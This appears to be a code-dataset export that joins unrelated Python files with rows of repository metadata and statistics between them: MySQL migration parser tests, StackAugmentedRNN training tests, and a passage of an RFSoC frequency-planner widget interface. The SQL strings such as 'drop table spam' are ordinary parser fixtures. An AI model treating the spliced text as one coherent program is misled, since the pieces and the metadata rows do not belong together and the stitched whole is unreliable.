statements = MySQL._parse_sql_statements('; ; create table eggs; drop table spam; ; ;')
self.assertEqual(2, len(statements))
self.assertEqual('create table eggs', statements[0])
self.assertEqual('drop table spam', statements[1])
def test_it_should_parse_sql_statements_with_html_inside(self):
sql = u"""
create table eggs;
INSERT INTO widget_parameter_domain (widget_parameter_id, label, value)
VALUES ((SELECT MAX(widget_parameter_id)
FROM widget_parameter), "Carros", '<div class="box-zap-geral">
<div class="box-zap box-zap-autos">
<a class="logo" target="_blank" title="ZAP" href="http://www.zap.com.br/Parceiros/g1/RedirG1.aspx?CodParceriaLink=42&URL=http://www.zap.com.br">');
drop table spam;
"""
statements = MySQL._parse_sql_statements(sql)
expected_sql_with_html = """INSERT INTO widget_parameter_domain (widget_parameter_id, label, value)
VALUES ((SELECT MAX(widget_parameter_id)
FROM widget_parameter), "Carros", '<div class="box-zap-geral">
<div class="box-zap box-zap-autos">
<a class="logo" target="_blank" title="ZAP" href="http://www.zap.com.br/Parceiros/g1/RedirG1.aspx?CodParceriaLink=42&URL=http://www.zap.com.br">')"""
self.assertEqual(3, len(statements))
self.assertEqual('create table eggs', statements[0])
self.assertEqual(expected_sql_with_html, statements[1])
self.assertEqual('drop table spam', statements[2])
def test_it_should_get_none_for_a_non_existent_version_in_database(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
ret = mysql.get_version_id_from_version_number('xxx')
self.assertEqual(None, ret)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call("select id from __db_version__ where version = 'xxx' order by id desc;")
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_get_most_recent_version_for_a_existent_label_in_database(self):
self.fetchone_returns["select version from __db_version__ where label = 'xxx' order by id desc"] = ["vesion", "version2", "version3"]
mysql = MySQL(self.config_mock, self.db_driver_mock)
ret = mysql.get_version_number_from_label('xxx')
self.assertEqual("vesion", ret)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call("select version from __db_version__ where label = 'xxx' order by id desc")
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def test_it_should_get_none_for_a_non_existent_label_in_database(self):
mysql = MySQL(self.config_mock, self.db_driver_mock)
ret = mysql.get_version_number_from_label('xxx')
self.assertEqual(None, ret)
expected_query_calls = [
call('create database if not exists `migration_test`;')
]
self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
self.db_mock.select_db.assert_called_with('migration_test')
self.assertEqual(2, self.db_mock.commit.call_count)
self.assertEqual(5, self.db_mock.close.call_count)
expected_execute_calls = [
call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
call('select count(*) from __db_version__;'),
call('insert into __db_version__ (version) values ("0")'),
call("select version from __db_version__ where label = 'xxx' order by id desc")
]
self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
self.assertEqual(4, self.cursor_mock.close.call_count)
def side_effect(self, returns, default_value):
result = returns.get(self.last_execute_command, default_value)
if isinstance(result, Exception):
raise result
return result
def execute_side_effect(self, *args):
self.last_execute_command = args[0]
return self.side_effect(self.execute_returns, 0)
def fetchone_side_effect(self, *args):
return self.side_effect(self.fetchone_returns, None)
def close_side_effect(self, *args):
return self.side_effect(self.close_returns, None)
if __name__ == "__main__":
unittest.main()
| 57.901499
| 298
| 0.697374
| 3,520
| 27,040
| 5.003693
| 0.06875
| 0.084313
| 0.035769
| 0.030659
| 0.838699
| 0.810481
| 0.794981
| 0.77914
| 0.774825
| 0.762505
| 0
| 0.030888
| 0.196598
| 27,040
| 466
| 299
| 58.025751
| 0.779875
| 0
| 0
| 0.564433
| 0
| 0.054124
| 0.365459
| 0.052885
| 0
| 0
| 0
| 0
| 0.306701
| 0
| null | null | 0.002577
| 0.018041
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f2b33e639f75e9f4bd82d79d798e99f2256e2a
| 7,484
|
py
|
Python
|
tests/stackRNN_tests.py
|
NovaXiong/ReLeaSE
|
aaed3af62a43fb06c1ce7c60edda74f2836d0952
|
[
"MIT"
] | 257
|
2018-06-20T15:58:01.000Z
|
2022-03-20T01:30:48.000Z
|
tests/stackRNN_tests.py
|
gkxiao/ReLeaSE
|
3d0f5533b7c5982a322bcf9cd1b03fb57afcd828
|
[
"MIT"
] | 33
|
2018-06-03T05:16:34.000Z
|
2022-03-04T08:49:28.000Z
|
tests/stackRNN_tests.py
|
gkxiao/ReLeaSE
|
3d0f5533b7c5982a322bcf9cd1b03fb57afcd828
|
[
"MIT"
] | 120
|
2018-06-27T03:41:48.000Z
|
2022-03-29T13:23:55.000Z
|
"""
Unit tests for StackAugmentedRNN class
"""
import sys
sys.path.append('./')
import pytest
import torch
from stackRNN import StackAugmentedRNN
from data import GeneratorData
gen_data_path = './data/logP_labels.csv'
gen_data = GeneratorData(training_data_path=gen_data_path, delimiter=',',
cols_to_read=[1], keep_header=False)
hidden_size = 50
stack_width = 50
stack_depth = 10
lr = 0.001
optimizer_instance = torch.optim.Adadelta
use_cuda = True
def test_bidirectional_stack_gru():
layer_type = 'GRU'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=True,
has_stack=True,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_unidirectional_stack_gru():
layer_type = 'GRU'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=False,
has_stack=True,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_unidirectional_gru_no_stack():
layer_type = 'GRU'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=False,
has_stack=False,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_bidirectional_gru_no_stack():
layer_type = 'GRU'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=True,
has_stack=False,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_bidirectional_stack_lstm():
layer_type = 'LSTM'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=True,
has_stack=True,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_unidirectional_stack_lstm():
layer_type = 'LSTM'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=False,
has_stack=True,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_unidirectional_lstm_no_stack():
layer_type = 'LSTM'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=False,
has_stack=False,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
def test_bidirectional_lstm_no_stack():
layer_type = 'LSTM'
my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
hidden_size=hidden_size,
output_size=gen_data.n_characters,
layer_type=layer_type,
n_layers=1, is_bidirectional=True,
has_stack=False,
stack_width=stack_width,
stack_depth=stack_depth,
use_cuda=use_cuda,
optimizer_instance=optimizer_instance,
lr=lr)
my_generator = my_generator.cuda()
losses = my_generator.fit(gen_data, 100)
my_generator.evaluate(gen_data)
| 43.260116
| 75
| 0.485703
| 670
| 7,484
| 5.013433
| 0.1
| 0.130991
| 0.052397
| 0.05716
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0
| 0.010623
| 0.459113
| 7,484
| 172
| 76
| 43.511628
| 0.81917
| 0.005078
| 0
| 0.839161
| 0
| 0
| 0.007126
| 0.002958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055944
| false
| 0
| 0.034965
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f321da93c17b582d91b5ab6eb89a1a0612871c
| 42,564
|
py
|
Python
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 9
|
2021-02-26T17:20:35.000Z
|
2022-02-14T12:03:20.000Z
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 1
|
2021-03-12T10:26:20.000Z
|
2021-03-12T10:26:20.000Z
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 4
|
2021-02-27T20:07:43.000Z
|
2021-07-29T23:20:47.000Z
|
__author__ = "Joshua Goldsmith"
__organisation__ = "The Univeristy of Strathclyde"
__support__ = "https://github.com/strath-sdr/rfsoc_frequency_planner"
from ipywidgets import widgets
import plotly.graph_objs as go
from .calculation import FrequencyPlannerADC, FrequencyPlannerDAC, FrequencyPlannerDDC, FrequencyPlannerDUC
plot_width = 1000
plot_height = 550
class ADCWidgets:
def __init__(self):
self.data = FrequencyPlannerADC()
self._plot = self.__setup_plot()
self._label_layout = widgets.Layout(width='80px')
self._slider_layout = widgets.Layout(width='120px')
self._entry_layout = widgets.Layout(width='90px')
self._units_layout = widgets.Layout(width='37px')
self._button_layout = widgets.Layout(width='87px', fontsize=12)
self.fs_label = widgets.Label("Fs", layout=self._label_layout)
self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
self.fs_slider.observe(self.__update_fs, 'value')
self.fc_label = widgets.Label("Fc", layout=self._label_layout)
self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fc_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
self.fc_slider.observe(self.__update_fc, 'value')
self.bw_label = widgets.Label("Bandwidth", layout=self._label_layout)
self.bw_slider = widgets.FloatSlider(value=self.data.fs_bw, min=0.0, max=self.fs_slider.value/2, step=0.01, readout=False, layout=self._slider_layout)
self.bw_entry = widgets.BoundedFloatText(value=self.bw_slider.value, min=self.bw_slider.min, max=self.bw_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.bw_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.bw_slider, 'value'), (self.bw_entry, 'value'))
self.bw_slider.observe(self.__update_bw, 'value')
self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.40, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pll_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
self.pll_slider.observe(self.__update_pll, 'value')
self.il_label = widgets.Label("IL Factor", layout=self._label_layout)
self.il_blank = widgets.Label("", layout=self._slider_layout)
self.il_entry = widgets.Dropdown(options=["4","8"],value=str(self.data.il_factor), layout=self._entry_layout)
self.il_units = widgets.Label("X", layout=self._units_layout)
self.il_entry.observe(self.__update_il, 'value')
self.calibration = widgets.Label(self.data.calibration_mode, layout=widgets.Layout(flex='auto'))
self.param_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
widgets.HBox([self.bw_label, self.bw_slider, self.bw_entry, self.bw_units]),
widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
widgets.HBox([self.il_label, self.il_blank, self.il_entry, self.il_units])])
])
self.param_controls.set_title(0, 'RF-DC Parameters')
self.params = widgets.VBox([
self.param_controls,
widgets.HBox([self.calibration])
])
self.layout = widgets.HBox([self.params, self._plot])
def __update_fs(self, change):
self.data.fs_rf = change['new']
self.bw_slider.max = change['new']/2
self.bw_entry.max = change['new']/2
self.__update_plot()
def __update_fc(self, change):
self.data.fc = change['new']
self.__update_plot()
def __update_bw(self, change):
self.data.fs_bw = change['new']
self.__update_plot()
def __update_pll(self, change):
self.data.pll_ref = change['new']
self.__update_plot()
def __update_il(self, change):
self.data.il_factor = int(change['new'])
# remove fs/8 spurs when il factor != 8
with self._plot.batch_update():
if change['new'] == "4":
self._plot.data[7+4].visible = False
self._plot.data[8+4].visible = False
self._plot.data[15+4].visible = False
self._plot.data[16+4].visible = False
self._plot.data[17+4].visible = False
self._plot.data[18+4].visible = False
else:
self._plot.data[7+4].visible = True
self._plot.data[8+4].visible = True
self._plot.data[15+4].visible = True
self._plot.data[16+4].visible = True
self._plot.data[17+4].visible = True
self._plot.data[18+4].visible = True
# only update when il factor changes from 4 to 8
self.__update_plot()
def __update_plot(self):
spurs_list = [self.data.hd2, self.data.hd3, self.data.hd4, self.data.hd5,
self.data.il_rx1, self.data.il_rx2, self.data.il_rx3, self.data.il_rx4, self.data.il_rx5,
self.data.fs2_m_hd2, self.data.fs4_m_hd2, self.data.fs4_p_hd2, self.data.fs2_m_hd3, self.data.fs4_m_hd3, self.data.fs4_p_hd3, self.data.fs8_m_hd2, self.data.fs8_p_hd2, self.data.fs8_m_hd3, self.data.fs8_p_hd3,
self.data.pll_mix_up, self.data.pll_mix_down]
with self._plot.batch_update():
self._plot.data[0].x = [self.data.rx_band['xmin'], self.data.rx_band['xmax']]
self._plot.data[1].x = [self.data.rx_band['xmin'], self.data.rx_band['xmin']]
self._plot.data[2].x = [self.data.rx_band['xmax'], self.data.rx_band['xmax']]
self._plot.data[3].x = [self.data.nyquist['xmax'], self.data.nyquist['xmax']]
for i in range(len(spurs_list)):
self._plot.data[i+4].x = [spurs_list[i]['xmin'], spurs_list[i]['xmax']]
if self.__intersection(spurs_list[i], self.data.rx_band):
self._plot.data[i+4].line['color'] = 'red'
else:
self._plot.data[i+4].line['color'] = spurs_list[i]['color']
self.calibration.value = self.data.calibration_mode
def __setup_plot(self):
rx_band = go.Scatter(x=[self.data.rx_band['xmin'], self.data.rx_band['xmax']], y=[self.data.rx_band['ymax'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
rx_band_l = go.Scatter(x=[self.data.rx_band['xmin'], self.data.rx_band['xmin']], y=[self.data.rx_band['ymin'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], showlegend=False, legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
rx_band_r = go.Scatter(x=[self.data.rx_band['xmax'], self.data.rx_band['xmax']], y=[self.data.rx_band['ymin'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], showlegend=False, legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
nyq = go.Scatter(x=[self.data.nyquist['xmin'], self.data.nyquist['xmin']], y=[self.data.nyquist['ymin'], self.data.nyquist['ymax']], line=dict(color=self.data.nyquist['color']), name=self.data.nyquist['label'], hovertext=self.data.nyquist['label'], hoverinfo='text+x')
spurs_list = [self.data.hd2, self.data.hd3, self.data.hd4, self.data.hd5,
self.data.il_rx1, self.data.il_rx2, self.data.il_rx3, self.data.il_rx4, self.data.il_rx5,
self.data.fs2_m_hd2, self.data.fs4_m_hd2, self.data.fs4_p_hd2, self.data.fs2_m_hd3, self.data.fs4_m_hd3, self.data.fs4_p_hd3, self.data.fs8_m_hd2, self.data.fs8_p_hd2, self.data.fs8_m_hd3, self.data.fs8_p_hd3,
self.data.pll_mix_up, self.data.pll_mix_down]
spurs = [go.Scatter(x=[d['xmin'], d['xmax']], y=[d['ymax'], d['ymax']], name=d['label'], hovertext=d['label'], hoverinfo='text+x', line=dict(color=d['color'])) for d in spurs_list]
plot_items = [rx_band, rx_band_l, rx_band_r, nyq] + spurs
plot = go.FigureWidget(plot_items)
plot.update_layout(
title={'text':"Digital Receiver Frequency Plan", 'x':0.46, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
xaxis_title={'text':"Frequency (MHz)"},
yaxis_title={'text':"Harmonic No."},
width=plot_width,
height=plot_height,
)
return plot
def __intersection(self, a, b):
if ((a['xmin'] < b['xmax']) and (a['xmax'] < b['xmin'])) or ((a['xmin'] > b['xmax']) and (a['xmax'] > b['xmin'])):
return False
else:
return True
class DACWidgets:
def __init__(self):
self.data = FrequencyPlannerDAC()
self._plot = self.__setup_plot()
self._label_layout = widgets.Layout(width='80px')
self._slider_layout = widgets.Layout(width='120px')
self._entry_layout = widgets.Layout(width='90px')
self._units_layout = widgets.Layout(width='37px')
self._button_layout = widgets.Layout(width='87px', fontsize=12)
self.fs_label = widgets.Label("Fs", layout=self._label_layout)
self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
self.fs_slider.observe(self.__update_fs, 'value')
self.fc_label = widgets.Label("Fc", layout=self._label_layout)
self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fc_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
self.fc_slider.observe(self.__update_fc, 'value')
self.bw_label = widgets.Label("Bandwidth", layout=self._label_layout)
self.bw_slider = widgets.FloatSlider(value=self.data.fs_bw, min=0.0, max=self.fs_slider.value/2, step=0.01, readout=False, layout=self._slider_layout)
self.bw_entry = widgets.BoundedFloatText(value=self.bw_slider.value, min=self.bw_slider.min, max=self.bw_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.bw_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.bw_slider, 'value'), (self.bw_entry, 'value'))
self.bw_slider.observe(self.__update_bw, 'value')
self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pll_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
self.pll_slider.observe(self.__update_pll, 'value')
self.mix_mode = widgets.Label(self.data.mix_mode, layout=widgets.Layout(flex='auto'))
self.param_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
widgets.HBox([self.bw_label, self.bw_slider, self.bw_entry, self.bw_units]),
widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units])])
])
self.param_controls.set_title(0,"RF-DC Parameters")
self.params = widgets.VBox([self.param_controls, self.mix_mode])
self.layout = widgets.HBox([self.params, self._plot])
def __update_fs(self, change):
self.data.fs_rf = change['new']
self.bw_slider.max = change['new']/2
self.bw_entry.max = change['new']/2
self.__update_plot()
def __update_fc(self, change):
self.data.fc = change['new']
self.__update_plot()
def __update_bw(self, change):
self.data.fs_bw = change['new']
self.__update_plot()
def __update_pll(self, change):
self.data.pll_ref = change['new']
self.__update_plot()
def __update_plot(self):
spurs_list = [self.data.hd2_nyq1,self.data.hd2_nyq2,self.data.hd3_nyq1,self.data.hd3_nyq2,
self.data.hd4_nyq1,self.data.hd4_nyq2,self.data.hd5_nyq1,self.data.hd5_nyq2,
self.data.pll_mix_up,self.data.pll_mix_up_image,
self.data.pll_mix_down,self.data.pll_mix_down_image]
with self._plot.batch_update():
self._plot.data[0].x = [self.data.tx_band['xmin'], self.data.tx_band['xmax']]
self._plot.data[1].x = [self.data.tx_band['xmin'], self.data.tx_band['xmin']]
self._plot.data[2].x = [self.data.tx_band['xmax'], self.data.tx_band['xmax']]
self._plot.data[3].x = [self.data.fimg['xmin'], self.data.fimg['xmax']]
self._plot.data[4].x = [self.data.fimg['xmin'], self.data.fimg['xmin']]
self._plot.data[5].x = [self.data.fimg['xmax'], self.data.fimg['xmax']]
self._plot.data[6].x = [self.data.nyquist['xmax'], self.data.nyquist['xmax']]
self._plot.data[7].x = [self.data.nyquist_image['xmax'], self.data.nyquist_image['xmax']]
for i in range(len(spurs_list)):
self._plot.data[i+8].x = [spurs_list[i]['xmin'], spurs_list[i]['xmax']]
if self.__intersection(spurs_list[i], self.data.tx_band) or self.__intersection(spurs_list[i], self.data.fimg):
self._plot.data[i+8].line['color'] = 'red'
else:
self._plot.data[i+8].line['color'] = spurs_list[i]['color']
self.mix_mode.value = self.data.mix_mode
def __setup_plot(self):
tx_band = go.Scatter(x=[self.data.tx_band['xmin'], self.data.tx_band['xmax']], y=[self.data.tx_band['ymax'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
tx_band_l = go.Scatter(x=[self.data.tx_band['xmin'], self.data.tx_band['xmin']], y=[self.data.tx_band['ymin'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], showlegend=False, legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
tx_band_r = go.Scatter(x=[self.data.tx_band['xmax'], self.data.tx_band['xmax']], y=[self.data.tx_band['ymin'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], showlegend=False, legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
fimag = go.Scatter(x=[self.data.fimg['xmin'], self.data.fimg['xmax']], y=[self.data.fimg['ymax'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
fimag_l = go.Scatter(x=[self.data.fimg['xmin'], self.data.fimg['xmin']], y=[self.data.fimg['ymin'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], showlegend=False, legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
fimag_r = go.Scatter(x=[self.data.fimg['xmax'], self.data.fimg['xmax']], y=[self.data.fimg['ymin'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], showlegend=False, legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
nyq = go.Scatter(x=[self.data.nyquist['xmin'], self.data.nyquist['xmin']], y=[self.data.nyquist['ymin'], self.data.nyquist['ymax']], line=dict(color=self.data.nyquist['color']), name=self.data.nyquist['label'], hovertext=self.data.nyquist['label'], hoverinfo='text+x')
nyq_img = go.Scatter(x=[self.data.nyquist_image['xmin'], self.data.nyquist_image['xmin']], y=[self.data.nyquist_image['ymin'], self.data.nyquist_image['ymax']], line=dict(color=self.data.nyquist_image['color']), name=self.data.nyquist_image['label'], hovertext=self.data.nyquist_image['label'], hoverinfo='text+x')
spurs_list = [self.data.hd2_nyq1,self.data.hd2_nyq2,self.data.hd3_nyq1,self.data.hd3_nyq2,
self.data.hd4_nyq1,self.data.hd4_nyq2,self.data.hd5_nyq1,self.data.hd5_nyq2,
self.data.pll_mix_up,self.data.pll_mix_up_image,
self.data.pll_mix_down,self.data.pll_mix_down_image]
spurs = [go.Scatter(x=[d['xmin'], d['xmax']], y=[d['ymax'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in spurs_list]
plot_items = [tx_band, tx_band_l, tx_band_r, fimag, fimag_l, fimag_r, nyq, nyq_img] + spurs
plot = go.FigureWidget(plot_items)
plot.update_layout(
title={'text':"Digital Transmitter Frequency Plan", 'x':0.45, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
xaxis_title={'text':"Frequency (MHz)"},
yaxis_title={'text':"Harmonic No."},
width=plot_width,
height=plot_height
)
return plot
def __intersection(self, a, b):
if ((a['xmin'] < b['xmax']) and (a['xmax'] < b['xmin'])) or ((a['xmin'] > b['xmax']) and (a['xmax'] > b['xmin'])):
return False
else:
return True
class DDCWidgets:
def __init__(self):
self.data = FrequencyPlannerDDC()
self._plot = self.__setup_plot()
self._label_layout = widgets.Layout(width='90px')
self._slider_layout = widgets.Layout(width='120px')
self._entry_layout = widgets.Layout(width='90px')
self._units_layout = widgets.Layout(width='55px')
self._button_layout = widgets.Layout(width='87px', fontsize=12)
self.fs_label = widgets.Label("Fs", layout=self._label_layout)
self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
self.fs_slider.observe(self.__update_fs, 'value')
self.fc_label = widgets.Label("Fc", layout=self._label_layout)
self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
